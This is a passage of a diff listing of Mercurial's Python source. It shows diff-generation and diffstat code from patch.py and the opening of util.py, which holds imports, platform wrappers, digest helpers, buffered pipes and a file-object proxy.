2684 2684 "file %s doesn't start with relroot %s" % (f, relroot))
2685 2685
2686 2686 for f1, f2, copyop in _filepairs(modified, added, removed, copy, opts):
2687 2687 content1 = None
2688 2688 content2 = None
2689 2689 fctx1 = None
2690 2690 fctx2 = None
2691 2691 flag1 = None
2692 2692 flag2 = None
2693 2693 if f1:
2694 2694 fctx1 = getfilectx(f1, ctx1)
2695 2695 if opts.git or losedatafn:
2696 2696 flag1 = ctx1.flags(f1)
2697 2697 if f2:
2698 2698 fctx2 = getfilectx(f2, ctx2)
2699 2699 if opts.git or losedatafn:
2700 2700 flag2 = ctx2.flags(f2)
2701 2701 # if binary is True, output "summary" or "base85", but not "text diff"
2702 2702 if opts.text:
2703 2703 binary = False
2704 2704 else:
2705 2705 binary = any(f.isbinary() for f in [fctx1, fctx2] if f is not None)
2706 2706
2707 2707 if losedatafn and not opts.git:
2708 2708 if (binary or
2709 2709 # copy/rename
2710 2710 f2 in copy or
2711 2711 # empty file creation
2712 2712 (not f1 and isempty(fctx2)) or
2713 2713 # empty file deletion
2714 2714 (isempty(fctx1) and not f2) or
2715 2715 # create with flags
2716 2716 (not f1 and flag2) or
2717 2717 # change flags
2718 2718 (f1 and f2 and flag1 != flag2)):
2719 2719 losedatafn(f2 or f1)
2720 2720
2721 2721 path1 = f1 or f2
2722 2722 path2 = f2 or f1
2723 2723 path1 = posixpath.join(prefix, path1[len(relroot):])
2724 2724 path2 = posixpath.join(prefix, path2[len(relroot):])
2725 2725 header = []
2726 2726 if opts.git:
2727 2727 header.append('diff --git %s%s %s%s' %
2728 2728 (aprefix, path1, bprefix, path2))
2729 2729 if not f1: # added
2730 2730 header.append('new file mode %s' % gitmode[flag2])
2731 2731 elif not f2: # removed
2732 2732 header.append('deleted file mode %s' % gitmode[flag1])
2733 2733 else: # modified/copied/renamed
2734 2734 mode1, mode2 = gitmode[flag1], gitmode[flag2]
2735 2735 if mode1 != mode2:
2736 2736 header.append('old mode %s' % mode1)
2737 2737 header.append('new mode %s' % mode2)
2738 2738 if copyop is not None:
2739 2739 if opts.showsimilarity:
2740 2740 sim = similar.score(ctx1[path1], ctx2[path2]) * 100
2741 2741 header.append('similarity index %d%%' % sim)
2742 2742 header.append('%s from %s' % (copyop, path1))
2743 2743 header.append('%s to %s' % (copyop, path2))
2744 2744 elif revs and not repo.ui.quiet:
2745 2745 header.append(diffline(path1, revs))
2746 2746
2747 2747 # fctx.is | diffopts | what to | is fctx.data()
2748 2748 # binary() | text nobinary git index | output? | outputted?
2749 2749 # ------------------------------------|----------------------------
2750 2750 # yes | no no no * | summary | no
2751 2751 # yes | no no yes * | base85 | yes
2752 2752 # yes | no yes no * | summary | no
2753 2753 # yes | no yes yes 0 | summary | no
2754 2754 # yes | no yes yes >0 | summary | semi [1]
2755 2755 # yes | yes * * * | text diff | yes
2756 2756 # no | * * * * | text diff | yes
2757 2757 # [1]: hash(fctx.data()) is outputted. so fctx.data() cannot be faked
2758 2758 if binary and (not opts.git or (opts.git and opts.nobinary and not
2759 2759 opts.index)):
2760 2760 # fast path: no binary content will be displayed, content1 and
2761 2761 # content2 are only used for equivalent test. cmp() could have a
2762 2762 # fast path.
2763 2763 if fctx1 is not None:
2764 2764 content1 = b'\0'
2765 2765 if fctx2 is not None:
2766 2766 if fctx1 is not None and not fctx1.cmp(fctx2):
2767 2767 content2 = b'\0' # not different
2768 2768 else:
2769 2769 content2 = b'\0\0'
2770 2770 else:
2771 2771 # normal path: load contents
2772 2772 if fctx1 is not None:
2773 2773 content1 = fctx1.data()
2774 2774 if fctx2 is not None:
2775 2775 content2 = fctx2.data()
2776 2776
2777 2777 if binary and opts.git and not opts.nobinary:
2778 2778 text = mdiff.b85diff(content1, content2)
2779 2779 if text:
2780 2780 header.append('index %s..%s' %
2781 2781 (gitindex(content1), gitindex(content2)))
2782 2782 hunks = (None, [text]),
2783 2783 else:
2784 2784 if opts.git and opts.index > 0:
2785 2785 flag = flag1
2786 2786 if flag is None:
2787 2787 flag = flag2
2788 2788 header.append('index %s..%s %s' %
2789 2789 (gitindex(content1)[0:opts.index],
2790 2790 gitindex(content2)[0:opts.index],
2791 2791 gitmode[flag]))
2792 2792
2793 2793 uheaders, hunks = mdiff.unidiff(content1, date1,
2794 2794 content2, date2,
2795 2795 path1, path2,
2796 2796 binary=binary, opts=opts)
2797 2797 header.extend(uheaders)
2798 2798 yield fctx1, fctx2, header, hunks
2799 2799
2800 2800 def diffstatsum(stats):
2801 2801 maxfile, maxtotal, addtotal, removetotal, binary = 0, 0, 0, 0, False
2802 2802 for f, a, r, b in stats:
2803 2803 maxfile = max(maxfile, encoding.colwidth(f))
2804 2804 maxtotal = max(maxtotal, a + r)
2805 2805 addtotal += a
2806 2806 removetotal += r
2807 2807 binary = binary or b
2808 2808
2809 2809 return maxfile, maxtotal, addtotal, removetotal, binary
2810 2810
2811 2811 def diffstatdata(lines):
2812 2812 diffre = re.compile('^diff .*-r [a-z0-9]+\s(.*)$')
2813 2813
2814 2814 results = []
2815 2815 filename, adds, removes, isbinary = None, 0, 0, False
2816 2816
2817 2817 def addresult():
2818 2818 if filename:
2819 2819 results.append((filename, adds, removes, isbinary))
2820 2820
2821 2821 # inheader is used to track if a line is in the
2822 2822 # header portion of the diff. This helps properly account
2823 2823 # for lines that start with '--' or '++'
2824 2824 inheader = False
2825 2825
2826 2826 for line in lines:
2827 2827 if line.startswith('diff'):
2828 2828 addresult()
2829 2829 # starting a new file diff
2830 2830 # set numbers to 0 and reset inheader
2831 2831 inheader = True
2832 2832 adds, removes, isbinary = 0, 0, False
2833 2833 if line.startswith('diff --git a/'):
2834 2834 filename = gitre.search(line).group(2)
2835 2835 elif line.startswith('diff -r'):
2836 2836 # format: "diff -r ... -r ... filename"
2837 2837 filename = diffre.search(line).group(1)
2838 2838 elif line.startswith('@@'):
2839 2839 inheader = False
2840 2840 elif line.startswith('+') and not inheader:
2841 2841 adds += 1
2842 2842 elif line.startswith('-') and not inheader:
2843 2843 removes += 1
2844 2844 elif (line.startswith('GIT binary patch') or
2845 2845 line.startswith('Binary file')):
2846 2846 isbinary = True
2847 2847 addresult()
2848 2848 return results
2849 2849
2850 2850 def diffstat(lines, width=80):
2851 2851 output = []
2852 2852 stats = diffstatdata(lines)
2853 2853 maxname, maxtotal, totaladds, totalremoves, hasbinary = diffstatsum(stats)
2854 2854
2855 2855 countwidth = len(str(maxtotal))
2856 2856 if hasbinary and countwidth < 3:
2857 2857 countwidth = 3
2858 2858 graphwidth = width - countwidth - maxname - 6
2859 2859 if graphwidth < 10:
2860 2860 graphwidth = 10
2861 2861
2862 2862 def scale(i):
2863 2863 if maxtotal <= graphwidth:
2864 2864 return i
2865 2865 # If diffstat runs out of room it doesn't print anything,
2866 2866 # which isn't very useful, so always print at least one + or -
2867 2867 # if there were at least some changes.
2868 2868 return max(i * graphwidth // maxtotal, int(bool(i)))
2869 2869
2870 2870 for filename, adds, removes, isbinary in stats:
2871 2871 if isbinary:
2872 2872 count = 'Bin'
2873 2873 else:
2874 2874 count = '%d' % (adds + removes)
2875 2875 pluses = '+' * scale(adds)
2876 2876 minuses = '-' * scale(removes)
2877 2877 output.append(' %s%s | %*s %s%s\n' %
2878 2878 (filename, ' ' * (maxname - encoding.colwidth(filename)),
2879 2879 countwidth, count, pluses, minuses))
2880 2880
2881 2881 if stats:
2882 2882 output.append(_(' %d files changed, %d insertions(+), '
2883 2883 '%d deletions(-)\n')
2884 2884 % (len(stats), totaladds, totalremoves))
2885 2885
2886 2886 return ''.join(output)
2887 2887
2888 2888 def diffstatui(*args, **kw):
2889 2889 '''like diffstat(), but yields 2-tuples of (output, label) for
2890 2890 ui.write()
2891 2891 '''
2892 2892
2893 2893 for line in diffstat(*args, **kw).splitlines():
2894 2894 if line and line[-1] in '+-':
2895 2895 name, graph = line.rsplit(' ', 1)
2896 2896 yield (name + ' ', '')
2897 2897 m = re.search(br'\++', graph)
2898 2898 if m:
2899 2899 yield (m.group(0), 'diffstat.inserted')
2900 2900 m = re.search(br'-+', graph)
2901 2901 if m:
2902 2902 yield (m.group(0), 'diffstat.deleted')
2903 2903 else:
2904 2904 yield (line, '')
2905 2905 yield ('\n', '')
@@ -1,4066 +1,4087 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import codecs
21 21 import collections
22 22 import contextlib
23 23 import errno
24 24 import gc
25 25 import hashlib
26 26 import imp
27 27 import io
28 28 import itertools
29 29 import mmap
30 30 import os
31 31 import platform as pyplatform
32 32 import re as remod
33 33 import shutil
34 34 import signal
35 35 import socket
36 36 import stat
37 37 import string
38 38 import subprocess
39 39 import sys
40 40 import tempfile
41 41 import textwrap
42 42 import time
43 43 import traceback
44 44 import warnings
45 45 import zlib
46 46
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 node as nodemod,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56 from .utils import dateutil
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 empty = pycompat.empty
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 queue = pycompat.queue
70 70 socketserver = pycompat.socketserver
71 71 stderr = pycompat.stderr
72 72 stdin = pycompat.stdin
73 73 stdout = pycompat.stdout
74 74 stringio = pycompat.stringio
75 75 xmlrpclib = pycompat.xmlrpclib
76 76
77 77 httpserver = urllibcompat.httpserver
78 78 urlerr = urllibcompat.urlerr
79 79 urlreq = urllibcompat.urlreq
80 80
81 81 # workaround for win32mbcs
82 82 _filenamebytestr = pycompat.bytestr
83 83
84 84 def isatty(fp):
85 85 try:
86 86 return fp.isatty()
87 87 except AttributeError:
88 88 return False
89 89
90 90 # glibc determines buffering on first write to stdout - if we replace a TTY
91 91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 92 # buffering
93 93 if isatty(stdout):
94 94 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
95 95
96 96 if pycompat.iswindows:
97 97 from . import windows as platform
98 98 stdout = platform.winstdout(stdout)
99 99 else:
100 100 from . import posix as platform
101 101
102 102 _ = i18n._
103 103
104 104 bindunixsocket = platform.bindunixsocket
105 105 cachestat = platform.cachestat
106 106 checkexec = platform.checkexec
107 107 checklink = platform.checklink
108 108 copymode = platform.copymode
109 109 executablepath = platform.executablepath
110 110 expandglobs = platform.expandglobs
111 111 explainexit = platform.explainexit
112 112 findexe = platform.findexe
113 113 getfsmountpoint = platform.getfsmountpoint
114 114 getfstype = platform.getfstype
115 115 gethgcmd = platform.gethgcmd
116 116 getuser = platform.getuser
117 117 getpid = os.getpid
118 118 groupmembers = platform.groupmembers
119 119 groupname = platform.groupname
120 120 hidewindow = platform.hidewindow
121 121 isexec = platform.isexec
122 122 isowner = platform.isowner
123 123 listdir = osutil.listdir
124 124 localpath = platform.localpath
125 125 lookupreg = platform.lookupreg
126 126 makedir = platform.makedir
127 127 nlinks = platform.nlinks
128 128 normpath = platform.normpath
129 129 normcase = platform.normcase
130 130 normcasespec = platform.normcasespec
131 131 normcasefallback = platform.normcasefallback
132 132 openhardlinks = platform.openhardlinks
133 133 oslink = platform.oslink
134 134 parsepatchoutput = platform.parsepatchoutput
135 135 pconvert = platform.pconvert
136 136 poll = platform.poll
137 137 popen = platform.popen
138 138 posixfile = platform.posixfile
139 139 quotecommand = platform.quotecommand
140 140 readpipe = platform.readpipe
141 141 rename = platform.rename
142 142 removedirs = platform.removedirs
143 143 samedevice = platform.samedevice
144 144 samefile = platform.samefile
145 145 samestat = platform.samestat
146 146 setbinary = platform.setbinary
147 147 setflags = platform.setflags
148 148 setsignalhandler = platform.setsignalhandler
149 149 shellquote = platform.shellquote
150 150 shellsplit = platform.shellsplit
151 151 spawndetached = platform.spawndetached
152 152 split = platform.split
153 153 sshargs = platform.sshargs
154 154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 155 statisexec = platform.statisexec
156 156 statislink = platform.statislink
157 157 testpid = platform.testpid
158 158 umask = platform.umask
159 159 unlink = platform.unlink
160 160 username = platform.username
161 161
162 162 try:
163 163 recvfds = osutil.recvfds
164 164 except AttributeError:
165 165 pass
166 166 try:
167 167 setprocname = osutil.setprocname
168 168 except AttributeError:
169 169 pass
170 170 try:
171 171 unblocksignal = osutil.unblocksignal
172 172 except AttributeError:
173 173 pass
174 174
175 175 # Python compatibility
176 176
177 177 _notset = object()
178 178
179 179 def safehasattr(thing, attr):
180 180 return getattr(thing, attr, _notset) is not _notset
181 181
182 182 def _rapply(f, xs):
183 183 if xs is None:
184 184 # assume None means non-value of optional data
185 185 return xs
186 186 if isinstance(xs, (list, set, tuple)):
187 187 return type(xs)(_rapply(f, x) for x in xs)
188 188 if isinstance(xs, dict):
189 189 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
190 190 return f(xs)
191 191
192 192 def rapply(f, xs):
193 193 """Apply function recursively to every item preserving the data structure
194 194
195 195 >>> def f(x):
196 196 ... return 'f(%s)' % x
197 197 >>> rapply(f, None) is None
198 198 True
199 199 >>> rapply(f, 'a')
200 200 'f(a)'
201 201 >>> rapply(f, {'a'}) == {'f(a)'}
202 202 True
203 203 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
204 204 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
205 205
206 206 >>> xs = [object()]
207 207 >>> rapply(pycompat.identity, xs) is xs
208 208 True
209 209 """
210 210 if f is pycompat.identity:
211 211 # fast path mainly for py2
212 212 return xs
213 213 return _rapply(f, xs)
214 214
215 215 def bitsfrom(container):
216 216 bits = 0
217 217 for bit in container:
218 218 bits |= bit
219 219 return bits
220 220
221 221 # python 2.6 still have deprecation warning enabled by default. We do not want
222 222 # to display anything to standard user so detect if we are running test and
223 223 # only use python deprecation warning in this case.
224 224 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
225 225 if _dowarn:
226 226 # explicitly unfilter our warning for python 2.7
227 227 #
228 228 # The option of setting PYTHONWARNINGS in the test runner was investigated.
229 229 # However, module name set through PYTHONWARNINGS was exactly matched, so
230 230 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
231 231 # makes the whole PYTHONWARNINGS thing useless for our usecase.
232 232 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
233 233 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
234 234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
235 235 if _dowarn and pycompat.ispy3:
236 236 # silence warning emitted by passing user string to re.sub()
237 237 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
238 238 r'mercurial')
239 239 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
240 240 DeprecationWarning, r'mercurial')
241 241
242 242 def nouideprecwarn(msg, version, stacklevel=1):
243 243 """Issue an python native deprecation warning
244 244
245 245 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
246 246 """
247 247 if _dowarn:
248 248 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
249 249 " update your code.)") % version
250 250 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
251 251
252 252 DIGESTS = {
253 253 'md5': hashlib.md5,
254 254 'sha1': hashlib.sha1,
255 255 'sha512': hashlib.sha512,
256 256 }
257 257 # List of digest types from strongest to weakest
258 258 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
259 259
260 260 for k in DIGESTS_BY_STRENGTH:
261 261 assert k in DIGESTS
262 262
263 263 class digester(object):
264 264 """helper to compute digests.
265 265
266 266 This helper can be used to compute one or more digests given their name.
267 267
268 268 >>> d = digester([b'md5', b'sha1'])
269 269 >>> d.update(b'foo')
270 270 >>> [k for k in sorted(d)]
271 271 ['md5', 'sha1']
272 272 >>> d[b'md5']
273 273 'acbd18db4cc2f85cedef654fccc4a4d8'
274 274 >>> d[b'sha1']
275 275 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
276 276 >>> digester.preferred([b'md5', b'sha1'])
277 277 'sha1'
278 278 """
279 279
280 280 def __init__(self, digests, s=''):
281 281 self._hashes = {}
282 282 for k in digests:
283 283 if k not in DIGESTS:
284 284 raise Abort(_('unknown digest type: %s') % k)
285 285 self._hashes[k] = DIGESTS[k]()
286 286 if s:
287 287 self.update(s)
288 288
289 289 def update(self, data):
290 290 for h in self._hashes.values():
291 291 h.update(data)
292 292
293 293 def __getitem__(self, key):
294 294 if key not in DIGESTS:
295 295 raise Abort(_('unknown digest type: %s') % k)
296 296 return nodemod.hex(self._hashes[key].digest())
297 297
298 298 def __iter__(self):
299 299 return iter(self._hashes)
300 300
301 301 @staticmethod
302 302 def preferred(supported):
303 303 """returns the strongest digest type in both supported and DIGESTS."""
304 304
305 305 for k in DIGESTS_BY_STRENGTH:
306 306 if k in supported:
307 307 return k
308 308 return None
309 309
310 310 class digestchecker(object):
311 311 """file handle wrapper that additionally checks content against a given
312 312 size and digests.
313 313
314 314 d = digestchecker(fh, size, {'md5': '...'})
315 315
316 316 When multiple digests are given, all of them are validated.
317 317 """
318 318
319 319 def __init__(self, fh, size, digests):
320 320 self._fh = fh
321 321 self._size = size
322 322 self._got = 0
323 323 self._digests = dict(digests)
324 324 self._digester = digester(self._digests.keys())
325 325
326 326 def read(self, length=-1):
327 327 content = self._fh.read(length)
328 328 self._digester.update(content)
329 329 self._got += len(content)
330 330 return content
331 331
332 332 def validate(self):
333 333 if self._size != self._got:
334 334 raise Abort(_('size mismatch: expected %d, got %d') %
335 335 (self._size, self._got))
336 336 for k, v in self._digests.items():
337 337 if v != self._digester[k]:
338 338 # i18n: first parameter is a digest name
339 339 raise Abort(_('%s mismatch: expected %s, got %s') %
340 340 (k, v, self._digester[k]))
341 341
342 342 try:
343 343 buffer = buffer
344 344 except NameError:
345 345 def buffer(sliceable, offset=0, length=None):
346 346 if length is not None:
347 347 return memoryview(sliceable)[offset:offset + length]
348 348 return memoryview(sliceable)[offset:]
349 349
350 350 closefds = pycompat.isposix
351 351
352 352 _chunksize = 4096
353 353
354 354 class bufferedinputpipe(object):
355 355 """a manually buffered input pipe
356 356
357 357 Python will not let us use buffered IO and lazy reading with 'polling' at
358 358 the same time. We cannot probe the buffer state and select will not detect
359 359 that data are ready to read if they are already buffered.
360 360
361 361 This class let us work around that by implementing its own buffering
362 362 (allowing efficient readline) while offering a way to know if the buffer is
363 363 empty from the output (allowing collaboration of the buffer with polling).
364 364
365 365 This class lives in the 'util' module because it makes use of the 'os'
366 366 module from the python stdlib.
367 367 """
368 368 def __new__(cls, fh):
369 369 # If we receive a fileobjectproxy, we need to use a variation of this
370 370 # class that notifies observers about activity.
371 371 if isinstance(fh, fileobjectproxy):
372 372 cls = observedbufferedinputpipe
373 373
374 374 return super(bufferedinputpipe, cls).__new__(cls)
375 375
376 376 def __init__(self, input):
377 377 self._input = input
378 378 self._buffer = []
379 379 self._eof = False
380 380 self._lenbuf = 0
381 381
382 382 @property
383 383 def hasbuffer(self):
384 384 """True is any data is currently buffered
385 385
386 386 This will be used externally a pre-step for polling IO. If there is
387 387 already data then no polling should be set in place."""
388 388 return bool(self._buffer)
389 389
390 390 @property
391 391 def closed(self):
392 392 return self._input.closed
393 393
394 394 def fileno(self):
395 395 return self._input.fileno()
396 396
397 397 def close(self):
398 398 return self._input.close()
399 399
400 400 def read(self, size):
401 401 while (not self._eof) and (self._lenbuf < size):
402 402 self._fillbuffer()
403 403 return self._frombuffer(size)
404 404
405 405 def readline(self, *args, **kwargs):
406 406 if 1 < len(self._buffer):
407 407 # this should not happen because both read and readline end with a
408 408 # _frombuffer call that collapse it.
409 409 self._buffer = [''.join(self._buffer)]
410 410 self._lenbuf = len(self._buffer[0])
411 411 lfi = -1
412 412 if self._buffer:
413 413 lfi = self._buffer[-1].find('\n')
414 414 while (not self._eof) and lfi < 0:
415 415 self._fillbuffer()
416 416 if self._buffer:
417 417 lfi = self._buffer[-1].find('\n')
418 418 size = lfi + 1
419 419 if lfi < 0: # end of file
420 420 size = self._lenbuf
421 421 elif 1 < len(self._buffer):
422 422 # we need to take previous chunks into account
423 423 size += self._lenbuf - len(self._buffer[-1])
424 424 return self._frombuffer(size)
425 425
426 426 def _frombuffer(self, size):
427 427 """return at most 'size' data from the buffer
428 428
429 429 The data are removed from the buffer."""
430 430 if size == 0 or not self._buffer:
431 431 return ''
432 432 buf = self._buffer[0]
433 433 if 1 < len(self._buffer):
434 434 buf = ''.join(self._buffer)
435 435
436 436 data = buf[:size]
437 437 buf = buf[len(data):]
438 438 if buf:
439 439 self._buffer = [buf]
440 440 self._lenbuf = len(buf)
441 441 else:
442 442 self._buffer = []
443 443 self._lenbuf = 0
444 444 return data
445 445
446 446 def _fillbuffer(self):
447 447 """read data to the buffer"""
448 448 data = os.read(self._input.fileno(), _chunksize)
449 449 if not data:
450 450 self._eof = True
451 451 else:
452 452 self._lenbuf += len(data)
453 453 self._buffer.append(data)
454 454
455 455 return data
456 456
457 457 def mmapread(fp):
458 458 try:
459 459 fd = getattr(fp, 'fileno', lambda: fp)()
460 460 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
461 461 except ValueError:
462 462 # Empty files cannot be mmapped, but mmapread should still work. Check
463 463 # if the file is empty, and if so, return an empty buffer.
464 464 if os.fstat(fd).st_size == 0:
465 465 return ''
466 466 raise
467 467
468 468 def popen2(cmd, env=None, newlines=False):
469 469 # Setting bufsize to -1 lets the system decide the buffer size.
470 470 # The default for bufsize is 0, meaning unbuffered. This leads to
471 471 # poor performance on Mac OS X: http://bugs.python.org/issue4194
472 472 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
473 473 close_fds=closefds,
474 474 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
475 475 universal_newlines=newlines,
476 476 env=env)
477 477 return p.stdin, p.stdout
478 478
479 479 def popen3(cmd, env=None, newlines=False):
480 480 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
481 481 return stdin, stdout, stderr
482 482
483 483 def popen4(cmd, env=None, newlines=False, bufsize=-1):
484 484 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
485 485 close_fds=closefds,
486 486 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
487 487 stderr=subprocess.PIPE,
488 488 universal_newlines=newlines,
489 489 env=env)
490 490 return p.stdin, p.stdout, p.stderr, p
491 491
492 492 class fileobjectproxy(object):
493 493 """A proxy around file objects that tells a watcher when events occur.
494 494
495 495 This type is intended to only be used for testing purposes. Think hard
496 496 before using it in important code.
497 497 """
498 498 __slots__ = (
499 499 r'_orig',
500 500 r'_observer',
501 501 )
502 502
503 503 def __init__(self, fh, observer):
504 504 object.__setattr__(self, r'_orig', fh)
505 505 object.__setattr__(self, r'_observer', observer)
506 506
507 507 def __getattribute__(self, name):
508 508 ours = {
509 509 r'_observer',
510 510
511 511 # IOBase
512 512 r'close',
513 513 # closed if a property
514 514 r'fileno',
515 515 r'flush',
516 516 r'isatty',
517 517 r'readable',
518 518 r'readline',
519 519 r'readlines',
520 520 r'seek',
521 521 r'seekable',
522 522 r'tell',
523 523 r'truncate',
524 524 r'writable',
525 525 r'writelines',
526 526 # RawIOBase
527 527 r'read',
528 528 r'readall',
529 529 r'readinto',
530 530 r'write',
531 531 # BufferedIOBase
532 532 # raw is a property
533 533 r'detach',
534 534 # read defined above
535 535 r'read1',
536 536 # readinto defined above
537 537 # write defined above
538 538 }
539 539
540 540 # We only observe some methods.
541 541 if name in ours:
542 542 return object.__getattribute__(self, name)
543 543
544 544 return getattr(object.__getattribute__(self, r'_orig'), name)
545 545
546 546 def __nonzero__(self):
547 547 return bool(object.__getattribute__(self, r'_orig'))
548 548
549 549 __bool__ = __nonzero__
550 550
551 551 def __delattr__(self, name):
552 552 return delattr(object.__getattribute__(self, r'_orig'), name)
553 553
554 554 def __setattr__(self, name, value):
555 555 return setattr(object.__getattribute__(self, r'_orig'), name, value)
556 556
557 557 def __iter__(self):
558 558 return object.__getattribute__(self, r'_orig').__iter__()
559 559
560 560 def _observedcall(self, name, *args, **kwargs):
561 561 # Call the original object.
562 562 orig = object.__getattribute__(self, r'_orig')
563 563 res = getattr(orig, name)(*args, **kwargs)
564 564
565 565 # Call a method on the observer of the same name with arguments
566 566 # so it can react, log, etc.
567 567 observer = object.__getattribute__(self, r'_observer')
568 568 fn = getattr(observer, name, None)
569 569 if fn:
570 570 fn(res, *args, **kwargs)
571 571
572 572 return res
573 573
574 574 def close(self, *args, **kwargs):
575 575 return object.__getattribute__(self, r'_observedcall')(
576 576 r'close', *args, **kwargs)
577 577
578 578 def fileno(self, *args, **kwargs):
579 579 return object.__getattribute__(self, r'_observedcall')(
580 580 r'fileno', *args, **kwargs)
581 581
582 582 def flush(self, *args, **kwargs):
583 583 return object.__getattribute__(self, r'_observedcall')(
584 584 r'flush', *args, **kwargs)
585 585
586 586 def isatty(self, *args, **kwargs):
587 587 return object.__getattribute__(self, r'_observedcall')(
588 588 r'isatty', *args, **kwargs)
589 589
590 590 def readable(self, *args, **kwargs):
591 591 return object.__getattribute__(self, r'_observedcall')(
592 592 r'readable', *args, **kwargs)
593 593
594 594 def readline(self, *args, **kwargs):
595 595 return object.__getattribute__(self, r'_observedcall')(
596 596 r'readline', *args, **kwargs)
597 597
598 598 def readlines(self, *args, **kwargs):
599 599 return object.__getattribute__(self, r'_observedcall')(
600 600 r'readlines', *args, **kwargs)
601 601
602 602 def seek(self, *args, **kwargs):
603 603 return object.__getattribute__(self, r'_observedcall')(
604 604 r'seek', *args, **kwargs)
605 605
606 606 def seekable(self, *args, **kwargs):
607 607 return object.__getattribute__(self, r'_observedcall')(
608 608 r'seekable', *args, **kwargs)
609 609
610 610 def tell(self, *args, **kwargs):
611 611 return object.__getattribute__(self, r'_observedcall')(
612 612 r'tell', *args, **kwargs)
613 613
614 614 def truncate(self, *args, **kwargs):
615 615 return object.__getattribute__(self, r'_observedcall')(
616 616 r'truncate', *args, **kwargs)
617 617
618 618 def writable(self, *args, **kwargs):
619 619 return object.__getattribute__(self, r'_observedcall')(
620 620 r'writable', *args, **kwargs)
621 621
622 622 def writelines(self, *args, **kwargs):
623 623 return object.__getattribute__(self, r'_observedcall')(
624 624 r'writelines', *args, **kwargs)
625 625
626 626 def read(self, *args, **kwargs):
627 627 return object.__getattribute__(self, r'_observedcall')(
628 628 r'read', *args, **kwargs)
629 629
630 630 def readall(self, *args, **kwargs):
631 631 return object.__getattribute__(self, r'_observedcall')(
632 632 r'readall', *args, **kwargs)
633 633
634 634 def readinto(self, *args, **kwargs):
635 635 return object.__getattribute__(self, r'_observedcall')(
636 636 r'readinto', *args, **kwargs)
637 637
638 638 def write(self, *args, **kwargs):
639 639 return object.__getattribute__(self, r'_observedcall')(
640 640 r'write', *args, **kwargs)
641 641
642 642 def detach(self, *args, **kwargs):
643 643 return object.__getattribute__(self, r'_observedcall')(
644 644 r'detach', *args, **kwargs)
645 645
646 646 def read1(self, *args, **kwargs):
647 647 return object.__getattribute__(self, r'_observedcall')(
648 648 r'read1', *args, **kwargs)
649 649
650 650 class observedbufferedinputpipe(bufferedinputpipe):
651 651 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
652 652
653 653 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
654 654 bypass ``fileobjectproxy``. Because of this, we need to make
655 655 ``bufferedinputpipe`` aware of these operations.
656 656
657 657 This variation of ``bufferedinputpipe`` can notify observers about
658 658 ``os.read()`` events. It also re-publishes other events, such as
659 659 ``read()`` and ``readline()``.
660 660 """
661 661 def _fillbuffer(self):
662 662 res = super(observedbufferedinputpipe, self)._fillbuffer()
663 663
664 664 fn = getattr(self._input._observer, r'osread', None)
665 665 if fn:
666 666 fn(res, _chunksize)
667 667
668 668 return res
669 669
670 670 # We use different observer methods because the operation isn't
671 671 # performed on the actual file object but on us.
672 672 def read(self, size):
673 673 res = super(observedbufferedinputpipe, self).read(size)
674 674
675 675 fn = getattr(self._input._observer, r'bufferedread', None)
676 676 if fn:
677 677 fn(res, size)
678 678
679 679 return res
680 680
681 681 def readline(self, *args, **kwargs):
682 682 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
683 683
684 684 fn = getattr(self._input._observer, r'bufferedreadline', None)
685 685 if fn:
686 686 fn(res)
687 687
688 688 return res
689 689
690 690 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
691 691 DATA_ESCAPE_MAP.update({
692 692 b'\\': b'\\\\',
693 693 b'\r': br'\r',
694 694 b'\n': br'\n',
695 695 })
696 696 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
697 697
698 698 def escapedata(s):
699 699 if isinstance(s, bytearray):
700 700 s = bytes(s)
701 701
702 702 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
703 703
704 704 class fileobjectobserver(object):
705 705 """Logs file object activity."""
